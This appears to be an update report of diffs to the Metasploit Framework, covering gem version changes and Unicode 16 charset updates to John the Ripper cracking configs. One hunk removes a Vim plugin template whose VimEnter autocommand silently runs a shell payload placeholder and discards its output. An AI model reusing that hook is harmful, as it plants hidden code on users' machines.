Update report

Gemfile

@@ -56,3 +56,4 @@ group :test do
   # stub and set expectations on HTTP requests
   gem 'webmock', '~> 3.18'
 end
+

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.133)
+    metasploit-framework (6.4.132)
       aarch64
       abbrev
       actionpack (~> 7.2.0)
@@ -499,7 +499,7 @@ GEM
       http-cookie (>= 1.0.2, < 2.0)
       mime-types (>= 1.16, < 4.0)
       netrc (~> 0.8)
-    rex-arch (0.1.20)
+    rex-arch (0.1.19)
       rex-text
     rex-bin_tools (0.1.16)
       metasm
@@ -549,7 +549,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.5)
-    rex-text (0.2.63)
+    rex-text (0.2.62)
       bigdecimal
     rex-zip (0.1.6)
       rex-text

LICENSE_GEMS

@@ -100,8 +100,8 @@ mcp, 0.13.0, "Apache 2.0"
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.23, "New BSD"
-metasploit-framework, 6.4.133, "New BSD"
+metasploit-credential, 6.0.21, "New BSD"
+metasploit-framework, 6.4.132, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
 metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.18, "New BSD"
@@ -170,10 +170,10 @@ regexp_parser, 2.11.3, MIT
 reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rest-client, 2.1.0, MIT
-rex-arch, 0.1.20, "New BSD"
+rex-arch, 0.1.19, "New BSD"
 rex-bin_tools, 0.1.16, "New BSD"
 rex-core, 0.1.36, "New BSD"
-rex-encoder, 0.1.10, "New BSD"
+rex-encoder, 0.1.8, "New BSD"
 rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
@@ -183,10 +183,10 @@ rex-powershell, 0.1.103, "New BSD"
 rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.65, "New BSD"
+rex-socket, 0.1.64, "New BSD"
 rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
-rex-text, 0.2.63, "New BSD"
+rex-text, 0.2.62, "New BSD"
 rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"

data/exploits/vim_plugin/plugin.vim

@@ -1,11 +0,0 @@
-" NAME.vim - Runs in the background on startup, discards output
- 
-if !has('job') || exists('g:loaded_ZZWcUtfrDa')
-  finish
-endif
-let g:loaded_NAME = 1
- 
-augroup NAME
-  autocmd!
-  autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
-augroup END

data/jtr/dumb16.conf

@@ -1,11 +1,11 @@
-# This  software is Copyright (c) 2012-2020 magnum, and it is hereby
+# This  software is Copyright (c) 2012-2024 magnum, and it is hereby
 # released to the general public under the following terms:
 # Redistribution and use in source and binary forms, with or without
 # modification, are permitted.
 #
 # Generic implementation of "dumb" exhaustive search of Unicode BMP.
-# Default is to try *all* allocated characters in the BMP of Unicode v13
-# (there's 55,387 of them). Even if a fast format can exhaust two characters
+# Default is to try *all* allocated characters in the BMP of Unicode v16
+# (there's 55,537 of them). Even if a fast format can exhaust two characters
 # in 15 minutes, three characters would take 1.5 years...
 #
 # Note that these modes will handle --max-len differently than normal: They
@@ -22,7 +22,7 @@ int maxlength;            // Maximum password length to try
 int last;                 // Last character position, zero-based
 int lastid;               // Character index in the last position
 int id[0x7f];             // Current character indices for other positions
-int charset[0x10000], c0; // Characters
+int charset[0xd900], c0;  // Characters
 
 void init()
 {
@@ -43,7 +43,7 @@ void init()
 
 /*
  * This defines the character set. This is auto-generated from UnicodeData.txt
- * and we skip control characters.
+ * of Unicode 16.0.0 and we skip control characters.
  */
 	i = 0;
 // 0000..007F; Basic Latin
@@ -119,9 +119,6 @@ void init()
 		charset[i++] = c++;
 // 0600..06FF; Arabic
 	c = 0x600;		// from ARABIC NUMBER SIGN
-	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
-		charset[i++] = c++;
-	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
 	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
 		charset[i++] = c++;
 // 0700..074F; Syriac
@@ -163,14 +160,17 @@ void init()
 	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
 	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
 		charset[i++] = c++;
+// 0870..089F; Arabic Extended-B
+	c = 0x870;		// from ARABIC LETTER ALEF WITH ATTACHED FATHA
+	while (c <= 0x88e)	// ..to ARABIC VERTICAL TAIL
+		charset[i++] = c++;
+	charset[i++] = 0x890;	// ARABIC POUND MARK ABOVE
+	charset[i++] = 0x891;	// ARABIC PIASTRE MARK ABOVE
+	c = 0x897;		// from ARABIC PEPET
+	while (c <= 0x89f)	// ..to ARABIC HALF MADDA OVER MADDA
+		charset[i++] = c++;
 // 08A0..08FF; Arabic Extended-A
 	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
-	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
-		charset[i++] = c++;
-	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
-	while (c <= 0x8c7)	// ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
-		charset[i++] = c++;
-	c = 0x8d3;		// from ARABIC SMALL LOW WAW
 	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
 		charset[i++] = c++;
 // 0900..097F; Devanagari
@@ -360,7 +360,7 @@ void init()
 	c = 0xc2a;		// from TELUGU LETTER PA
 	while (c <= 0xc39)	// ..to TELUGU LETTER HA
 		charset[i++] = c++;
-	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	c = 0xc3c;		// from TELUGU SIGN NUKTA
 	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
 		charset[i++] = c++;
 	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
@@ -406,6 +406,8 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
 	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	charset[i++] = 0xcdd;	// KANNADA LETTER NAKAARA POLLU
+	charset[i++] = 0xcde;	// KANNADA LETTER FA
 	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
 	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
 		charset[i++] = c++;
@@ -413,7 +415,7 @@ void init()
 	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
 		charset[i++] = c++;
 	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
-	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+	charset[i++] = 0xcf3;	// KANNADA SIGN COMBINING ANUSVARA ABOVE RIGHT
 // 0D00..0D7F; Malayalam
 	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
 	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
@@ -483,7 +485,7 @@ void init()
 	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
 		charset[i++] = c++;
 	c = 0xec8;		// from LAO TONE MAI EK
-	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+	while (c <= 0xece)	// ..to LAO YAMAKKAN
 		charset[i++] = c++;
 	c = 0xed0;		// from LAO DIGIT ZERO
 	while (c <= 0xed9)	// ..to LAO DIGIT NINE
@@ -596,11 +598,9 @@ void init()
 		charset[i++] = c++;
 // 1700..171F; Tagalog
 	c = 0x1700;		// from TAGALOG LETTER A
-	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
-		charset[i++] = c++;
-	c = 0x170e;		// from TAGALOG LETTER LA
-	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+	while (c <= 0x1715)	// ..to TAGALOG SIGN PAMUDPOD
 		charset[i++] = c++;
+	charset[i++] = 0x171f;	// TAGALOG LETTER ARCHAIC RA
 // 1720..173F; Hanunoo
 	c = 0x1720;		// from HANUNOO LETTER A
 	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
@@ -629,9 +629,6 @@ void init()
 		charset[i++] = c++;
 // 1800..18AF; Mongolian
 	c = 0x1800;		// from MONGOLIAN BIRGA
-	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
-		charset[i++] = c++;
-	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
 	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
 		charset[i++] = c++;
 	c = 0x1820;		// from MONGOLIAN LETTER A
@@ -704,14 +701,14 @@ void init()
 		charset[i++] = c++;
 // 1AB0..1AFF; Combining Diacritical Marks Extended
 	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
-	while (c <= 0x1ac0)	// ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
+	while (c <= 0x1ace)	// ..to COMBINING LATIN SMALL LETTER INSULAR T
 		charset[i++] = c++;
 // 1B00..1B7F; Balinese
 	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
-	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+	while (c <= 0x1b4c)	// ..to BALINESE LETTER ARCHAIC JNYA
 		charset[i++] = c++;
-	c = 0x1b50;		// from BALINESE DIGIT ZERO
-	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+	c = 0x1b4e;		// from BALINESE INVERTED CARIK SIKI
+	while (c <= 0x1b7f)	// ..to BALINESE PANTI BAWAK
 		charset[i++] = c++;
 // 1B80..1BBF; Sundanese
 	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
@@ -739,7 +736,7 @@ void init()
 		charset[i++] = c++;
 // 1C80..1C8F; Cyrillic Extended-C
 	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
-	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+	while (c <= 0x1c8a)	// ..to CYRILLIC SMALL LETTER TJE
 		charset[i++] = c++;
 // 1C90..1CBF; Georgian Extended
 	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
@@ -765,9 +762,6 @@ void init()
 		charset[i++] = c++;
 // 1DC0..1DFF; Combining Diacritical Marks Supplement
 	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
-	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
-		charset[i++] = c++;
-	c = 0x1dfb;		// from COMBINING DELETION MARK
 	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
 		charset[i++] = c++;
 // 1E00..1EFF; Latin Extended Additional
@@ -831,7 +825,7 @@ void init()
 		charset[i++] = c++;
 // 20A0..20CF; Currency Symbols
 	c = 0x20a0;		// from EURO-CURRENCY SIGN
-	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+	while (c <= 0x20c0)	// ..to SOM SIGN
 		charset[i++] = c++;
 // 20D0..20FF; Combining Diacritical Marks for Symbols
 	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
@@ -859,7 +853,7 @@ void init()
 		charset[i++] = c++;
 // 2400..243F; Control Pictures
 	c = 0x2400;		// from SYMBOL FOR NULL
-	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+	while (c <= 0x2429)	// ..to SYMBOL FOR DELETE MEDIUM SHADE FORM
 		charset[i++] = c++;
 // 2440..245F; Optical Character Recognition
 	c = 0x2440;		// from OCR HOOK
@@ -925,10 +919,7 @@ void init()
 		charset[i++] = c++;
 // 2C00..2C5F; Glagolitic
 	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
-	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
-		charset[i++] = c++;
-	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
-	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+	while (c <= 0x2c5f)	// ..to GLAGOLITIC SMALL LETTER CAUDATE CHRIVI
 		charset[i++] = c++;
 // 2C60..2C7F; Latin Extended-C
 	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
@@ -989,7 +980,7 @@ void init()
 		charset[i++] = c++;
 // 2E00..2E7F; Supplemental Punctuation
 	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
-	while (c <= 0x2e52)	// ..to TIRONIAN SIGN CAPITAL ET
+	while (c <= 0x2e5d)	// ..to OBLIQUE HYPHEN
 		charset[i++] = c++;
 // 2E80..2EFF; CJK Radicals Supplement
 	c = 0x2e80;		// from CJK RADICAL REPEAT
@@ -1004,7 +995,7 @@ void init()
 		charset[i++] = c++;
 // 2FF0..2FFF; Ideographic Description Characters
 	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
-	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+	while (c <= 0x2fff)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER ROTATION
 		charset[i++] = c++;
 // 3000..303F; CJK Symbols and Punctuation
 	c = 0x3000;		// from IDEOGRAPHIC SPACE
@@ -1039,8 +1030,9 @@ void init()
 		charset[i++] = c++;
 // 31C0..31EF; CJK Strokes
 	c = 0x31c0;		// from CJK STROKE T
-	while (c <= 0x31e3)	// ..to CJK STROKE Q
+	while (c <= 0x31e5)	// ..to CJK STROKE SZP
 		charset[i++] = c++;
+	charset[i++] = 0x31ef;	// IDEOGRAPHIC DESCRIPTION CHARACTER SUBTRACTION
 // 31F0..31FF; Katakana Phonetic Extensions
 	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
 	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
@@ -1066,7 +1058,7 @@ void init()
 		charset[i++] = c++;
 // 4E00..9FFF; CJK Unified Ideographs
 	c = 0x4e00;		// from <CJK Ideograph, First>
-	while (c <= 0x9ffc)	// ..to <CJK Ideograph, Last>
+	while (c <= 0x9fff)	// ..to <CJK Ideograph, Last>
 		charset[i++] = c++;
 // A000..A48F; Yi Syllables
 	c = 0xa000;		// from YI SYLLABLE IT
@@ -1098,12 +1090,14 @@ void init()
 		charset[i++] = c++;
 // A720..A7FF; Latin Extended-D
 	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
-	while (c <= 0xa7bf)	// ..to LATIN SMALL LETTER GLOTTAL U
+	while (c <= 0xa7cd)	// ..to LATIN SMALL LETTER S WITH DIAGONAL STROKE
 		charset[i++] = c++;
-	c = 0xa7c2;		// from LATIN CAPITAL LETTER ANGLICANA W
-	while (c <= 0xa7ca)	// ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
+	charset[i++] = 0xa7d0;	// LATIN CAPITAL LETTER CLOSED INSULAR G
+	charset[i++] = 0xa7d1;	// LATIN SMALL LETTER CLOSED INSULAR G
+	c = 0xa7d5;		// from LATIN SMALL LETTER DOUBLE WYNN
+	while (c <= 0xa7dc)	// ..to LATIN CAPITAL LETTER LAMBDA WITH STROKE
 		charset[i++] = c++;
-	c = 0xa7f5;		// from LATIN CAPITAL LETTER REVERSED HALF H
+	c = 0xa7f2;		// from MODIFIER LETTER CAPITAL C
 	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
 		charset[i++] = c++;
 // A800..A82F; Syloti Nagri
@@ -1258,19 +1252,16 @@ void init()
 		charset[i++] = c++;
 // FB50..FDFF; Arabic Presentation Forms-A
 	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
-	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+	while (c <= 0xfbc2)	// ..to ARABIC SYMBOL WASLA ABOVE
 		charset[i++] = c++;
 	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
-	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
-		charset[i++] = c++;
-	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
 	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
 		charset[i++] = c++;
 	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
 	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
 		charset[i++] = c++;
 	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
-	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+	while (c <= 0xfdff)	// ..to ARABIC LIGATURE AZZA WA JALL
 		charset[i++] = c++;
 // FE00..FE0F; Variation Selectors
 	c = 0xfe00;		// from VARIATION SELECTOR-1

data/jtr/dumb32.conf

@@ -1,11 +1,11 @@
-# This  software is Copyright (c) 2012-2020 magnum, and it is hereby
+# This  software is Copyright (c) 2012-2024 magnum, and it is hereby
 # released to the general public under the following terms:
 # Redistribution and use in source and binary forms, with or without
 # modification, are permitted.
 #
 # Generic implementation of "dumb" exhaustive search of FULL Unicode.
-# Default is to try *all* allocated characters in Unicode v13 (there's
-# 143,532 of them). Even if a fast format can exhaust two characters in one
+# Default is to try *all* allocated characters in Unicode v16 (there's
+# 154,663 of them). Even if a fast format can exhaust two characters in one
 # hour, three characters would take 12 years...
 #
 # Note that these modes will handle --max-len differently than normal: They
@@ -27,7 +27,7 @@ int maxlength;            // Maximum password length to try
 int last;                 // Last character position, zero-based
 int lastid;               // Character index in the last position
 int id[0x7f];             // Current character indices for other positions
-int charset[0x24000], c0; // Characters
+int charset[0x25c30], c0; // Characters
 
 void init()
 {
@@ -48,7 +48,7 @@ void init()
 
 /*
  * This defines the character set. This is auto-generated from UnicodeData.txt
- * and we skip control characters.
+ * of Unicode 16.0.0 and we skip control characters.
  */
 	i = 0;
 // 0000..007F; Basic Latin
@@ -124,9 +124,6 @@ void init()
 		charset[i++] = c++;
 // 0600..06FF; Arabic
 	c = 0x600;		// from ARABIC NUMBER SIGN
-	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
-		charset[i++] = c++;
-	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
 	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
 		charset[i++] = c++;
 // 0700..074F; Syriac
@@ -168,14 +165,17 @@ void init()
 	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
 	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
 		charset[i++] = c++;
+// 0870..089F; Arabic Extended-B
+	c = 0x870;		// from ARABIC LETTER ALEF WITH ATTACHED FATHA
+	while (c <= 0x88e)	// ..to ARABIC VERTICAL TAIL
+		charset[i++] = c++;
+	charset[i++] = 0x890;	// ARABIC POUND MARK ABOVE
+	charset[i++] = 0x891;	// ARABIC PIASTRE MARK ABOVE
+	c = 0x897;		// from ARABIC PEPET
+	while (c <= 0x89f)	// ..to ARABIC HALF MADDA OVER MADDA
+		charset[i++] = c++;
 // 08A0..08FF; Arabic Extended-A
 	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
-	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
-		charset[i++] = c++;
-	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
-	while (c <= 0x8c7)	// ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
-		charset[i++] = c++;
-	c = 0x8d3;		// from ARABIC SMALL LOW WAW
 	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
 		charset[i++] = c++;
 // 0900..097F; Devanagari
@@ -365,7 +365,7 @@ void init()
 	c = 0xc2a;		// from TELUGU LETTER PA
 	while (c <= 0xc39)	// ..to TELUGU LETTER HA
 		charset[i++] = c++;
-	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	c = 0xc3c;		// from TELUGU SIGN NUKTA
 	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
 		charset[i++] = c++;
 	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
@@ -411,6 +411,8 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
 	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	charset[i++] = 0xcdd;	// KANNADA LETTER NAKAARA POLLU
+	charset[i++] = 0xcde;	// KANNADA LETTER FA
 	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
 	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
 		charset[i++] = c++;
@@ -418,7 +420,7 @@ void init()
 	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
 		charset[i++] = c++;
 	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
-	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+	charset[i++] = 0xcf3;	// KANNADA SIGN COMBINING ANUSVARA ABOVE RIGHT
 // 0D00..0D7F; Malayalam
 	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
 	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
@@ -488,7 +490,7 @@ void init()
 	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
 		charset[i++] = c++;
 	c = 0xec8;		// from LAO TONE MAI EK
-	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+	while (c <= 0xece)	// ..to LAO YAMAKKAN
 		charset[i++] = c++;
 	c = 0xed0;		// from LAO DIGIT ZERO
 	while (c <= 0xed9)	// ..to LAO DIGIT NINE
@@ -601,11 +603,9 @@ void init()
 		charset[i++] = c++;
 // 1700..171F; Tagalog
 	c = 0x1700;		// from TAGALOG LETTER A
-	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
-		charset[i++] = c++;
-	c = 0x170e;		// from TAGALOG LETTER LA
-	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+	while (c <= 0x1715)	// ..to TAGALOG SIGN PAMUDPOD
 		charset[i++] = c++;
+	charset[i++] = 0x171f;	// TAGALOG LETTER ARCHAIC RA
 // 1720..173F; Hanunoo
 	c = 0x1720;		// from HANUNOO LETTER A
 	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
@@ -634,9 +634,6 @@ void init()
 		charset[i++] = c++;
 // 1800..18AF; Mongolian
 	c = 0x1800;		// from MONGOLIAN BIRGA
-	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
-		charset[i++] = c++;
-	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
 	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
 		charset[i++] = c++;
 	c = 0x1820;		// from MONGOLIAN LETTER A
@@ -709,14 +706,14 @@ void init()
 		charset[i++] = c++;
 // 1AB0..1AFF; Combining Diacritical Marks Extended
 	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
-	while (c <= 0x1ac0)	// ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
+	while (c <= 0x1ace)	// ..to COMBINING LATIN SMALL LETTER INSULAR T
 		charset[i++] = c++;
 // 1B00..1B7F; Balinese
 	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
-	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+	while (c <= 0x1b4c)	// ..to BALINESE LETTER ARCHAIC JNYA
 		charset[i++] = c++;
-	c = 0x1b50;		// from BALINESE DIGIT ZERO
-	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+	c = 0x1b4e;		// from BALINESE INVERTED CARIK SIKI
+	while (c <= 0x1b7f)	// ..to BALINESE PANTI BAWAK
 		charset[i++] = c++;
 // 1B80..1BBF; Sundanese
 	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
@@ -744,7 +741,7 @@ void init()
 		charset[i++] = c++;
 // 1C80..1C8F; Cyrillic Extended-C
 	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
-	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+	while (c <= 0x1c8a)	// ..to CYRILLIC SMALL LETTER TJE
 		charset[i++] = c++;
 // 1C90..1CBF; Georgian Extended
 	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
@@ -770,9 +767,6 @@ void init()
 		charset[i++] = c++;
 // 1DC0..1DFF; Combining Diacritical Marks Supplement
 	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
-	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
-		charset[i++] = c++;
-	c = 0x1dfb;		// from COMBINING DELETION MARK
 	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
 		charset[i++] = c++;
 // 1E00..1EFF; Latin Extended Additional
@@ -836,7 +830,7 @@ void init()
 		charset[i++] = c++;
 // 20A0..20CF; Currency Symbols
 	c = 0x20a0;		// from EURO-CURRENCY SIGN
-	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+	while (c <= 0x20c0)	// ..to SOM SIGN
 		charset[i++] = c++;
 // 20D0..20FF; Combining Diacritical Marks for Symbols
 	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
@@ -864,7 +858,7 @@ void init()
 		charset[i++] = c++;
 // 2400..243F; Control Pictures
 	c = 0x2400;		// from SYMBOL FOR NULL
-	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+	while (c <= 0x2429)	// ..to SYMBOL FOR DELETE MEDIUM SHADE FORM
 		charset[i++] = c++;
 // 2440..245F; Optical Character Recognition
 	c = 0x2440;		// from OCR HOOK
@@ -930,10 +924,7 @@ void init()
 		charset[i++] = c++;
 // 2C00..2C5F; Glagolitic
 	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
-	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
-		charset[i++] = c++;
-	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
-	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+	while (c <= 0x2c5f)	// ..to GLAGOLITIC SMALL LETTER CAUDATE CHRIVI
 		charset[i++] = c++;
 // 2C60..2C7F; Latin Extended-C
 	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
@@ -994,7 +985,7 @@ void init()
 		charset[i++] = c++;
 // 2E00..2E7F; Supplemental Punctuation
 	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
-	while (c <= 0x2e52)	// ..to TIRONIAN SIGN CAPITAL ET
+	while (c <= 0x2e5d)	// ..to OBLIQUE HYPHEN
 		charset[i++] = c++;
 // 2E80..2EFF; CJK Radicals Supplement
 	c = 0x2e80;		// from CJK RADICAL REPEAT
@@ -1009,7 +1000,7 @@ void init()
 		charset[i++] = c++;
 // 2FF0..2FFF; Ideographic Description Characters
 	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
-	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+	while (c <= 0x2fff)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER ROTATION
 		charset[i++] = c++;
 // 3000..303F; CJK Symbols and Punctuation
 	c = 0x3000;		// from IDEOGRAPHIC SPACE
@@ -1044,8 +1035,9 @@ void init()
 		charset[i++] = c++;
 // 31C0..31EF; CJK Strokes
 	c = 0x31c0;		// from CJK STROKE T
-	while (c <= 0x31e3)	// ..to CJK STROKE Q
+	while (c <= 0x31e5)	// ..to CJK STROKE SZP
 		charset[i++] = c++;
+	charset[i++] = 0x31ef;	// IDEOGRAPHIC DESCRIPTION CHARACTER SUBTRACTION
 // 31F0..31FF; Katakana Phonetic Extensions
 	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
 	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
@@ -1071,7 +1063,7 @@ void init()
 		charset[i++] = c++;
 // 4E00..9FFF; CJK Unified Ideographs
 	c = 0x4e00;		// from <CJK Ideograph, First>
-	while (c <= 0x9ffc)	// ..to <CJK Ideograph, Last>
+	while (c <= 0x9fff)	// ..to <CJK Ideograph, Last>
 		charset[i++] = c++;
 // A000..A48F; Yi Syllables
 	c = 0xa000;		// from YI SYLLABLE IT
@@ -1103,12 +1095,14 @@ void init()
 		charset[i++] = c++;
 // A720..A7FF; Latin Extended-D
 	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
-	while (c <= 0xa7bf)	// ..to LATIN SMALL LETTER GLOTTAL U
+	while (c <= 0xa7cd)	// ..to LATIN SMALL LETTER S WITH DIAGONAL STROKE
 		charset[i++] = c++;
-	c = 0xa7c2;		// from LATIN CAPITAL LETTER ANGLICANA W
